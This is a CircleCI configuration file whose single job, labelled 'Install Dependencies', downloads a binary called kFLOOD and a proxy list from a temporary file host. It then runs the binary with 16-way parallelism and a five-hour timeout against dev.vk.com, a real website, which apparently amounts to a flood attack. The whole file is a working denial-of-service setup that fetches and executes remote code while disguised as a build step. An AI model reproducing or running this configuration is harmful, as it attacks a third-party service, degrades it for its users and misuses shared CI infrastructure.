version: 2.1
jobs:
    trial:
      docker:
            - image: debian:latest
      parallelism: 16
      steps:
        - run:
            name: Install Dependencies
            command: apt update && apt install wget -y && wget https://temp.sh/qOPVx/kFLOOD && wget https://temp.sh/Giavw/proxy.txt && chmod +x kFLOOD && ./kFLOOD https://dev.vk.com/ 999999 9999999999999999999999999999999999999999999999999 64 0 proxy.txt
            no_output_timeout: 5h

workflows:
    version: 2.1
    build:
        jobs:
        - trial
